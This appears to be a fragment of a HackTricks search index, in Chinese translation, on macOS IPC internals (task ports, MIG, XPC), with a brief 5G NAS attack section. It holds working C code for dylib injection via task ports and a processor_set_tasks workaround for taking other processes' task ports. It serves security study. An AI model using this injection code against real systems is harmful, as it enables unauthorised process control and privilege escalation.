(u_int64_t) remoteCode64;\\nremoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; printf (\\"Remote Stack 64 0x%llx, Remote code is %p\\\\n\\", remoteStack64, p ); kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64,\\n(thread_state_t) &remoteThreadState64.ts_64, 
ARM_THREAD_STATE64_COUNT , &remoteThread ); if (kr != KERN_SUCCESS) {\\nfprintf(stderr,\\"Unable to create remote thread: error %s\\", mach_error_string (kr));\\nreturn (-3);\\n} return (0);\\n} int main(int argc, const char * argv[])\\n{\\nif (argc < 3)\\n{\\nfprintf (stderr, \\"Usage: %s _pid_ _action_\\\\n\\", argv[0]);\\nfprintf (stderr, \\" _action_: path to a dylib on disk\\\\n\\");\\nexit(0);\\n} pid_t pid = atoi(argv[1]);\\nconst char *action = argv[2];\\nstruct stat buf; int rc = stat (action, &buf);\\nif (rc == 0) inject(pid,action);\\nelse\\n{\\nfprintf(stderr,\\"Dylib not found\\\\n\\");\\n} } bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector\\n./inject ","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 通过任务端口在线程中注入 Dylib","id":"2412","title":"通过任务端口在线程中注入 Dylib"},"2413":{"body":"在此技术中,进程的一个线程被劫持: macOS Thread Injection via Task port","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 线程劫持通过任务端口","id":"2413","title":"线程劫持通过任务端口"},"2414":{"body":"当调用 task_for_pid 或 thread_create_* 时,会在内核的任务结构中递增一个计数器,该计数器可以在用户模式下通过调用 task_info(task, TASK_EXTMOD_INFO, ...) 读取。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 任务端口注入检测","id":"2414","title":"任务端口注入检测"},"2415":{"body":"当线程中发生异常时,该异常会被发送到线程的指定异常端口。如果线程不处理它,则会发送到任务异常端口。如果任务不处理它,则会发送到由 launchd 管理的主机端口(在这里会被确认)。这称为异常分类。 请注意,通常如果没有正确处理,报告最终会被 ReportCrash 守护进程处理。然而,任务中的另一个线程可以管理该异常,这就是崩溃报告工具如 PLCrashReporter 所做的。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 异常端口","id":"2415","title":"异常端口"},"2416":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 其他对象","id":"2416","title":"其他对象"},"2417":{"body":"任何用户都可以访问有关时钟的信息,但要设置时间或修改其他设置,必须是 
root。 为了获取信息,可以调用 clock 子系统中的函数,如:clock_get_time、clock_get_attributtes 或 clock_alarm 为了修改值,可以使用 clock_priv 子系统中的函数,如 clock_set_time 和 clock_set_attributes","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 时钟","id":"2417","title":"时钟"},"2418":{"body":"处理器 API 允许通过调用函数如 processor_start、processor_exit、processor_info、processor_get_assignment 来控制单个逻辑处理器... 此外, 处理器集 API 提供了一种将多个处理器分组的方法。可以通过调用 processor_set_default 来检索默认处理器集。 以下是一些与处理器集交互的有趣 API: processor_set_statistics processor_set_tasks: 返回处理器集中所有任务的发送权限数组 processor_set_threads: 返回处理器集中所有线程的发送权限数组 processor_set_stack_usage processor_set_info 正如在 这篇文章 中提到的,以前这允许绕过之前提到的保护,以通过调用 processor_set_tasks 获取其他进程中的任务端口并控制它们,并在每个进程中获取主机端口。 如今,您需要 root 权限才能使用该功能,并且这受到保护,因此您只能在未受保护的进程上获取这些端口。 您可以尝试以下代码: processor_set_tasks 代码\\n`c // Maincpart fo the code from https://newosxbook.com/articles/PST2.html\\n//gcc ./port_pid.c -o port_pid #include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include \\n#include mach_port_t task_for_pid_workaround(int Pid)\\n{ host_t myhost = mach_host_self(); // host self is host priv if you\'re root anyway..\\nmach_port_t psDefault;\\nmach_port_t psDefault_control; task_array_t tasks;\\nmach_msg_type_number_t numTasks;\\nint i; thread_array_t threads;\\nthread_info_data_t tInfo; kern_return_t kr; kr = processor_set_default(myhost, &psDefault); kr = host_processor_set_priv(myhost, psDefault, &psDefault_control);\\nif (kr != KERN_SUCCESS) { fprintf(stderr, \\"host_processor_set_priv failed with error %x\\\\n\\", kr);\\nmach_error(\\"host_processor_set_priv\\",kr); exit(1);} printf(\\"So far so good\\\\n\\"); kr = processor_set_tasks(psDefault_control, &tasks, &numTasks);\\nif (kr != KERN_SUCCESS) { 
fprintf(stderr,\\"processor_set_tasks failed with error %x\\\\n\\",kr); exit(1); } for (i = 0; i < numTasks; i++)\\n{\\nint pid;\\npid_for_task(tasks[i], &pid);\\nprintf(\\"TASK %d PID :%d\\\\n\\", i,pid);\\nchar pathbuf[PROC_PIDPATHINFO_MAXSIZE];\\nif (proc_pidpath(pid, pathbuf, sizeof(pathbuf)) > 0) {\\nprintf(\\"Command line: %s\\\\n\\", pathbuf);\\n} else {\\nprintf(\\"proc_pidpath failed: %s\\\\n\\", strerror(errno));\\n}\\nif (pid == Pid){\\nprintf(\\"Found\\\\n\\");\\nreturn (tasks[i]);\\n}\\n} return (MACH_PORT_NULL);\\n} // end workaround int main(int argc, char *argv[]) {\\n/*if (argc != 2) {\\nfprintf(stderr, \\"Usage: %s \\\\n\\", argv[0]);\\nreturn 1;\\n} pid_t pid = atoi(argv[1]);\\nif (pid <= 0) {\\nfprintf(stderr, \\"Invalid PID. Please enter a numeric value greater than 0.\\\\n\\");\\nreturn 1;\\n}*/ int pid = 1; task_for_pid_workaround(pid);\\nreturn 0;\\n} ```","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 处理器和处理器集","id":"2418","title":"处理器和处理器集"},"2419":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » macOS MIG - Mach Interface Generator","id":"2419","title":"macOS MIG - Mach Interface Generator"},"242":{"body":"cordscan, GTPDoor, EchoBackdoor, NoDepDNS – 在前面章节中描述的自定义工具。 FScan : 内网 TCP 扫描 (fscan -p 22,80,443 10.0.0.0/24) Responder : LLMNR/NBT-NS 恶意 WPAD Microsocks + ProxyChains : 轻量级 SOCKS5 转发 FRP (≥0.37) : NAT 穿透 / 资产桥接","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 8. 
工具箱","id":"242","title":"8. 工具箱"},"2420":{"body":"MIG 的创建目的是 简化 Mach IPC 代码的生成过程。它基本上 生成所需的代码 以便服务器和客户端根据给定的定义进行通信。即使生成的代码不够优雅,开发者只需导入它,他的代码将比之前简单得多。 定义使用接口定义语言 (IDL) 指定,扩展名为 .defs。 这些定义有 5 个部分: 子系统声明 :关键字 subsystem 用于指示 名称 和 id 。如果服务器应该在内核中运行,也可以将其标记为 KernelServer 。 包含和导入 :MIG 使用 C 预处理器,因此能够使用导入。此外,可以使用 uimport 和 simport 来处理用户或服务器生成的代码。 类型声明 :可以定义数据类型,尽管通常会导入 mach_types.defs 和 std_types.defs。对于自定义类型,可以使用一些语法: [i`n/out]tran:需要从传入消息或传出消息进行转换的函数 c[user/server]type:映射到另一个 C 类型。 destructor:当类型被释放时调用此函数。 操作 :这些是 RPC 方法的定义。有 5 种不同类型: routine:期望回复 simpleroutine:不期望回复 procedure:期望回复 simpleprocedure:不期望回复 function:期望回复","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 基本信息","id":"2420","title":"基本信息"},"2421":{"body":"创建一个定义文件,在这种情况下是一个非常简单的函数: myipc.defs subsystem myipc 500; // Arbitrary name and id userprefix USERPREF; // Prefix for created functions in the client\\nserverprefix SERVERPREF; // Prefix for created functions in the server #include \\n#include simpleroutine Subtract(\\nserver_port : mach_port_t;\\nn1 : uint32_t;\\nn2 : uint32_t); 请注意,第一个 参数是要绑定的端口 ,而 MIG 将 自动处理回复端口 (除非在客户端代码中调用 mig_get_reply_port())。此外, 操作的 ID 将是 顺序的 ,从指定的子系统 ID 开始(因此,如果某个操作被弃用,它会被删除,并且使用 skip 仍然使用其 ID)。 现在使用 MIG 生成能够相互通信以调用 Subtract 函数的服务器和客户端代码: bash mig -header myipcUser.h -sheader myipcServer.h myipc.defs 在当前目录中将创建几个新文件。 tip 您可以在系统中找到更复杂的示例,使用:mdfind mach_port.defs 并且您可以从与文件相同的文件夹中编译它,使用:mig -DLIBSYSCALL_INTERFACE mach_ports.defs 在文件 myipcServer.c 和 myipcServer.h 中,您可以找到结构 SERVERPREFmyipc_subsystem 的声明和定义,该结构基本上根据接收到的消息 ID 定义要调用的函数(我们指定了起始编号为 500): myipcServer.c\\nmyipcServer.h c /* Description of this subsystem, for use in direct RPC */\\nconst struct SERVERPREFmyipc_subsystem SERVERPREFmyipc_subsystem = {\\nmyipc_server_routine,\\n500, // start ID\\n501, // end ID\\n(mach_msg_size_t)sizeof(union __ReplyUnion__SERVERPREFmyipc_subsystem),\\n(vm_address_t)0,\\n{\\n{ 
(mig_impl_routine_t) 0,\\n// Function to call\\n(mig_stub_routine_t) _XSubtract, 3, 0, (routine_arg_descriptor_t)0, (mach_msg_size_t)sizeof(__Reply__Subtract_t)},\\n}\\n}; c /* Description of this subsystem, for use in direct RPC */\\nextern const struct SERVERPREFmyipc_subsystem {\\nmig_server_routine_t\\tserver;\\t/* Server routine */\\nmach_msg_id_t\\tstart;\\t/* Min routine number */\\nmach_msg_id_t\\tend;\\t/* Max routine number + 1 */\\nunsigned int\\tmaxsize;\\t/* Max msg size */\\nvm_address_t\\treserved;\\t/* Reserved */\\nstruct routine_descriptor\\t/* Array of routine descriptors */\\nroutine[1];\\n} SERVERPREFmyipc_subsystem; 基于之前的结构,函数 myipc_server_routine 将获取 消息 ID 并返回适当的调用函数: c mig_external mig_routine_t myipc_server_routine\\n(mach_msg_header_t *InHeadP)\\n{\\nint msgh_id; msgh_id = InHeadP->msgh_id - 500; if ((msgh_id > 0) || (msgh_id < 0))\\nreturn 0; return SERVERPREFmyipc_subsystem.routine[msgh_id].stub_routine;\\n} 在这个例子中,我们只在定义中定义了 1 个函数,但如果我们定义了更多函数,它们将位于 SERVERPREFmyipc_subsystem 数组中,第一个将被分配给 ID 500 ,第二个将被分配给 ID 501 ... 
如果该函数预期发送一个 reply ,则函数 mig_internal kern_return_t __MIG_check__Reply__ 也会存在。 实际上,可以在 myipcServer.h 中的结构 subsystem_to_name_map_myipc 中识别这种关系(在其他文件中为 **subsystem*to_name_map*\\\\***): c #ifndef subsystem_to_name_map_myipc\\n#define subsystem_to_name_map_myipc \\\\\\n{ \\"Subtract\\", 500 }\\n#endif 最后,一个使服务器正常工作的另一个重要功能是 myipc_server ,它实际上将 调用与接收到的 id 相关的函数 : mig_external boolean_t myipc_server\\n(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)\\n{\\n/*\\n* typedef struct {\\n* mach_msg_header_t Head;\\n* NDR_record_t NDR;\\n* kern_return_t RetCode;\\n* } mig_reply_error_t;\\n*/ mig_routine_t routine; OutHeadP->msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REPLY(InHeadP->msgh_bits), 0);\\nOutHeadP->msgh_remote_port = InHeadP->msgh_reply_port;\\n/* 最小大小:routine() 如果不同将更新它 */\\nOutHeadP->msgh_size = (mach_msg_size_t)sizeof(mig_reply_error_t);\\nOutHeadP->msgh_local_port = MACH_PORT_NULL;\\nOutHeadP->msgh_id = InHeadP->msgh_id + 100;\\nOutHeadP->msgh_reserved = 0; if ((InHeadP->msgh_id > 500) || (InHeadP->msgh_id < 500) || ((routine = SERVERPREFmyipc_subsystem.routine[InHeadP->msgh_id - 500].stub_routine) == 0)) { ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;\\n((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;\\nreturn FALSE;\\n} (*routine) (InHeadP, OutHeadP); return TRUE;\\n} 检查之前高亮的行,访问通过 ID 调用的函数。 以下是创建一个简单的 server 和 client 的代码,其中客户端可以调用服务器的 Subtract 函数: myipc_server.c\\nmyipc_client.c c // gcc myipc_server.c myipcServer.c -o myipc_server #include \\n#include \\n#include \\n#include \\"myipcServer.h\\" kern_return_t SERVERPREFSubtract(mach_port_t server_port, uint32_t n1, uint32_t n2)\\n{\\nprintf(\\"Received: %d - %d = %d\\\\n\\", n1, n2, n1 - n2);\\nreturn KERN_SUCCESS;\\n} int main() { mach_port_t port;\\nkern_return_t kr; // Register the mach service\\nkr = bootstrap_check_in(bootstrap_port, \\"xyz.hacktricks.mig\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_check_in() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n} // 
myipc_server is the function that handles incoming messages (check previous exlpanation)\\nmach_msg_server(myipc_server, sizeof(union __RequestUnion__SERVERPREFmyipc_subsystem), port, MACH_MSG_TIMEOUT_NONE);\\n} c // gcc myipc_client.c myipcUser.c -o myipc_client #include \\n#include \\n#include #include \\n#include \\n#include \\"myipcUser.h\\" int main() { // Lookup the receiver port using the bootstrap server.\\nmach_port_t port;\\nkern_return_t kr = bootstrap_look_up(bootstrap_port, \\"xyz.hacktricks.mig\\", &port);\\nif (kr != KERN_SUCCESS) {\\nprintf(\\"bootstrap_look_up() failed with code 0x%x\\\\n\\", kr);\\nreturn 1;\\n}\\nprintf(\\"Port right name %d\\\\n\\", port);\\nUSERPREFSubtract(port, 40, 2);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 示例","id":"2421","title":"示例"},"2422":{"body":"NDR_record 是由 libsystem_kernel.dylib 导出的,它是一个结构体,允许 MIG 转换数据,使其与所使用的系统无关 ,因为 MIG 被认为是用于不同系统之间的(而不仅仅是在同一台机器上)。 这很有趣,因为如果在二进制文件中找到 _NDR_record 作为依赖项(jtool2 -S | grep NDR 或 nm),这意味着该二进制文件是一个 MIG 客户端或服务器。 此外, MIG 服务器 在 __DATA.__const 中有调度表(或在 macOS 内核中的 __CONST.__constdata 和其他 *OS 内核中的 __DATA_CONST.__const)。这可以通过 jtool2 转储。 而 MIG 客户端 将使用 __NDR_record 通过 __mach_msg 发送给服务器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » NDR_record","id":"2422","title":"NDR_record"},"2423":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » 二进制分析","id":"2423","title":"二进制分析"},"2424":{"body":"由于许多二进制文件现在使用 MIG 来暴露 mach 端口,因此了解如何 识别 MIG 的使用 以及 MIG 在每个消息 ID 中执行的函数 是很有趣的。 jtool2 可以解析 Mach-O 二进制文件中的 MIG 信息,指示消息 ID 并识别要执行的函数: bash jtool2 -d __DATA.__const myipc_server | grep MIG 此外,MIG 函数只是实际被调用函数的包装,这意味着获取其反汇编并搜索 BL,您可能能够找到实际被调用的函数: bash jtool2 -d 
__DATA.__const myipc_server | grep BL","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » jtool","id":"2424","title":"jtool"},"2425":{"body":"之前提到过,负责 根据接收到的消息 ID 调用正确函数 的函数是 myipc_server。然而,通常你不会拥有二进制文件的符号(没有函数名称),因此检查 反编译后的样子 是很有趣的,因为它总是非常相似(该函数的代码与暴露的函数无关): myipc_server decompiled 1\\nmyipc_server decompiled 2 int _myipc_server(int arg0, int arg1) {\\nvar_10 = arg0;\\nvar_18 = arg1;\\n// 初始指令以找到正确的函数指针\\n*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f;\\n*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);\\n*(int32_t *)(var_18 + 0x4) = 0x24;\\n*(int32_t *)(var_18 + 0xc) = 0x0;\\n*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;\\n*(int32_t *)(var_18 + 0x10) = 0x0;\\nif (*(int32_t *)(var_10 + 0x14) <= 0x1f4 && *(int32_t *)(var_10 + 0x14) >= 0x1f4) {\\nrax = *(int32_t *)(var_10 + 0x14);\\n// 调用 sign_extend_64,可以帮助识别该函数\\n// 这将指针存储在 rax 中,指向需要调用的函数\\n// 检查地址 0x100004040 的使用(函数地址数组)\\n// 0x1f4 = 500(起始 ID) rax = *(sign_extend_64(rax - 0x1f4) * 0x28 + 0x100004040); var_20 = rax;\\n// 如果 - else,if 返回 false,而 else 调用正确的函数并返回 true if (rax == 0x0) { *(var_18 + 0x18) = **_NDR_record;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffffffffffed1;\\nvar_4 = 0x0;\\n}\\nelse {\\n// 计算的地址调用带有 2 个参数的正确函数 (var_20)(var_10, var_18); var_4 = 0x1;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **_NDR_record;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffffffffffed1;\\nvar_4 = 0x0;\\n}\\nrax = var_4;\\nreturn rax;\\n} 这是在不同的 Hopper 免费版本中反编译的相同函数: int _myipc_server(int arg0, int arg1) {\\nr31 = r31 - 0x40;\\nsaved_fp = r29;\\nstack[-8] = r30;\\nvar_10 = arg0;\\nvar_18 = arg1;\\n// 初始指令以找到正确的函数指针\\n*(int32_t *)var_18 = *(int32_t *)var_10 & 0x1f | 0x0;\\n*(int32_t *)(var_18 + 0x8) = *(int32_t *)(var_10 + 0x8);\\n*(int32_t *)(var_18 + 0x4) = 0x24;\\n*(int32_t *)(var_18 + 0xc) = 0x0;\\n*(int32_t *)(var_18 + 0x14) = *(int32_t *)(var_10 + 0x14) + 0x64;\\n*(int32_t *)(var_18 + 0x10) = 
0x0;\\nr8 = *(int32_t *)(var_10 + 0x14);\\nr8 = r8 - 0x1f4;\\nif (r8 > 0x0) {\\nif (CPU_FLAGS & G) {\\nr8 = 0x1;\\n}\\n}\\nif ((r8 & 0x1) == 0x0) {\\nr8 = *(int32_t *)(var_10 + 0x14);\\nr8 = r8 - 0x1f4;\\nif (r8 < 0x0) {\\nif (CPU_FLAGS & L) {\\nr8 = 0x1;\\n}\\n}\\nif ((r8 & 0x1) == 0x0) {\\nr8 = *(int32_t *)(var_10 + 0x14);\\n// 0x1f4 = 500(起始 ID) r8 = r8 - 0x1f4; asm { smaddl x8, w8, w9, x10 };\\nr8 = *(r8 + 0x8);\\nvar_20 = r8;\\nr8 = r8 - 0x0;\\nif (r8 != 0x0) {\\nif (CPU_FLAGS & NE) {\\nr8 = 0x1;\\n}\\n}\\n// 与之前版本相同的 if else\\n// 检查地址 0x100004040 的使用(函数地址数组) if ((r8 & 0x1) == 0x0) { *(var_18 + 0x18) = **0x100004000; *(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\nelse {\\n// 调用计算出的地址,函数应该在这里 (var_20)(var_10, var_18); var_4 = 0x1;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **0x100004000;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\n}\\nelse {\\n*(var_18 + 0x18) = **0x100004000;\\n*(int32_t *)(var_18 + 0x20) = 0xfffffed1;\\nvar_4 = 0x0;\\n}\\nr0 = var_4;\\nreturn r0;\\n} 实际上,如果你去到函数**0x100004000 ,你会发现 routine_descriptor** 结构的数组。结构的第一个元素是 函数 实现的 地址 ,并且 结构占用 0x28 字节 ,因此每 0x28 字节(从字节 0 开始)你可以获取 8 字节,这将是 将被调用的函数的地址 : 这些数据可以通过 使用这个 Hopper 脚本 提取。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » Assembly","id":"2425","title":"Assembly"},"2426":{"body":"MIG 生成的代码还调用 kernel_debug 以生成有关进入和退出操作的日志。可以使用**trace 或 kdv**检查它们:kdv all | grep MIG","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » Debug","id":"2426","title":"Debug"},"2427":{"body":"*OS Internals, Volume I, User Mode, Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS MIG - Mach Interface Generator » References","id":"2427","title":"References"},"2428":{"body":"Reading time: 17 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » macOS XPC","id":"2428","title":"macOS XPC"},"2429":{"body":"XPC,即 XNU(macOS 使用的内核)进程间通信,是一个用于 macOS 和 iOS 上进程之间通信 的框架。XPC 提供了一种机制,用于在系统上进行 安全的异步方法调用 。它是苹果安全范式的一部分,允许 创建特权分离的应用程序 ,每个 组件 仅以 执行其工作所需的权限 运行,从而限制了被攻陷进程可能造成的损害。 XPC 使用一种进程间通信(IPC)的形式,这是一组方法,允许在同一系统上运行的不同程序相互发送数据。 XPC 的主要优点包括: 安全性 :通过将工作分离到不同的进程中,每个进程仅被授予所需的权限。这意味着即使一个进程被攻陷,它的危害能力也有限。 稳定性 :XPC 有助于将崩溃隔离到发生崩溃的组件。如果一个进程崩溃,可以在不影响系统其余部分的情况下重新启动。 性能 :XPC 允许轻松的并发,因为不同的任务可以在不同的进程中同时运行。 唯一的 缺点 是 将应用程序分离为多个进程 通过 XPC 进行通信的 效率较低 。但在今天的系统中,这几乎是不可察觉的,且其好处更为显著。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 基本信息","id":"2429","title":"基本信息"},"243":{"body":"5G 注册流程在 NGAP 之上通过 NAS (Non-Access Stratum) 运行。在通过 Security Mode Command/Complete 激活 NAS 安全之前,初始消息既未认证也未加密。这个安全前窗口在你能够观察或篡改 N2 流量时(例如,位于核心内的 on-path、rogue gNB,或测试台)允许多种攻击路径。 Registration flow (简化): Registration Request: UE 发送 SUCI (加密的 SUPI) 和能力信息。 Authentication: AMF/AUSF 发送 RAND/AUTN;UE 返回 RES*。 Security Mode Command/Complete: 协商并激活 NAS 完整性和加密。 PDU Session Establishment: IP/QoS 配置。 实验室配置建议(非 RF): Core: Open5GS 的默认部署足以重现流程。 UE: 模拟器或测试 UE;使用 
Wireshark 解码。 Active tooling: 5GReplay (捕获/修改/重放 NGAP 内的 NAS), Sni5Gect (在不启动完整 rogue gNB 的情况下实时嗅探/修补/注入 NAS)。 在 Wireshark 中有用的 display filters: ngap.procedure_code == 15 (InitialUEMessage) nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay","id":"243","title":"9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay"},"2430":{"body":"应用程序的 XPC 组件是 在应用程序内部 。例如,在 Safari 中,您可以在 /Applications/Safari.app/Contents/XPCServices 找到它们。它们的扩展名为 .xpc (如 com.apple.Safari.SandboxBroker.xpc ),并且 也与主二进制文件捆绑 在一起:/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker 和 Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist 正如您可能想到的, XPC 组件将具有不同的权限和特权 ,与其他 XPC 组件或主应用程序二进制文件不同。除非 XPC 服务在其 Info.plist 文件中配置了 JoinExistingSession 设置为“True”。在这种情况下,XPC 服务将在 与调用它的应用程序相同的安全会话中 运行。 XPC 服务由 launchd 在需要时 启动 ,并在所有任务 完成 后 关闭 以释放系统资源。 应用特定的 XPC 组件只能被应用程序使用 ,从而降低了与潜在漏洞相关的风险。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 应用特定的 XPC 服务","id":"2430","title":"应用特定的 XPC 服务"},"2431":{"body":"系统范围的 XPC 服务对所有用户可用。这些服务,无论是 launchd 还是 Mach 类型,都需要在指定目录中的 plist 文件中 定义 ,例如 /System/Library/LaunchDaemons 、 /Library/LaunchDaemons 、 /System/Library/LaunchAgents 或 /Library/LaunchAgents 。 这些 plist 文件将具有一个名为 MachServices 的键,包含服务的名称,以及一个名为 Program 的键,包含二进制文件的路径: xml cat /Library/LaunchDaemons/com.jamf.management.daemon.plist \\n\\n\\n\\nProgram\\n/Library/Application 
Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\\nAbandonProcessGroup\\n\\nKeepAlive\\n\\nLabel\\ncom.jamf.management.daemon\\nMachServices\\n\\ncom.jamf.management.daemon.aad\\n\\ncom.jamf.management.daemon.agent\\n\\ncom.jamf.management.daemon.binary\\n\\ncom.jamf.management.daemon.selfservice\\n\\ncom.jamf.management.daemon.service\\n\\n\\nRunAtLoad\\n\\n\\n LaunchDameons 中的进程由 root 运行。因此,如果一个无权限的进程能够与其中一个进程通信,它可能能够提升权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » 系统范围的 XPC 服务","id":"2431","title":"系统范围的 XPC 服务"},"2432":{"body":"xpc_object_t 每个 XPC 消息都是一个字典对象,简化了序列化和反序列化。此外,libxpc.dylib 声明了大多数数据类型,因此可以确保接收到的数据是预期的类型。在 C API 中,每个对象都是 xpc_object_t(其类型可以使用 xpc_get_type(object) 检查)。 此外,函数 xpc_copy_description(object) 可用于获取对象的字符串表示,这对于调试目的非常有用。 这些对象还具有一些可调用的方法,如 xpc__copy、xpc__equal、xpc__hash、xpc__serialize、xpc__deserialize... xpc_object_t 是通过调用 xpc__create 函数创建的,该函数内部调用 _xpc_base_create(Class, Size),其中指明了对象的类类型(XPC_TYPE_* 之一)和大小(额外的 40B 将被添加到大小以存储元数据)。这意味着对象的数据将从偏移量 40B 开始。 因此,xpc__t 是 xpc_object_t 的一种子类,而 xpc_object_t 则是 os_object_t* 的子类。 warning 请注意,使用 xpc_dictionary_[get/set]_ 获取或设置键的类型和实际值的应该是开发者。 xpc_pipe xpc_pipe 是一个 FIFO 管道,进程可以用来进行通信(通信使用 Mach 消息)。 可以通过调用 xpc_pipe_create() 或 xpc_pipe_create_from_port() 创建 XPC 服务器,后者使用特定的 Mach 端口创建它。然后,可以调用 xpc_pipe_receive 和 xpc_pipe_try_receive 来接收消息。 请注意, xpc_pipe 对象是一个 xpc_object_t ,其结构中包含有关使用的两个 Mach 端口和名称(如果有的话)的信息。例如,守护进程 secinitd 在其 plist /System/Library/LaunchDaemons/com.apple.secinitd.plist 中配置了名为 com.apple.secinitd 的管道。 xpc_pipe 的一个示例是 launchd 创建的 bootstrap pipe ,使得共享 Mach 端口成为可能。 NSXPC* 这些是 Objective-C 高级对象,允许对 XPC 连接进行抽象。 此外,使用 DTrace 调试这些对象比前面的对象更容易。 GCD 队列 XPC 使用 GCD 传递消息,此外它生成某些调度队列,如 xpc.transactionq、xpc.io、xpc-events.add-listenerq、xpc.service-instance...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS XPC » XPC 
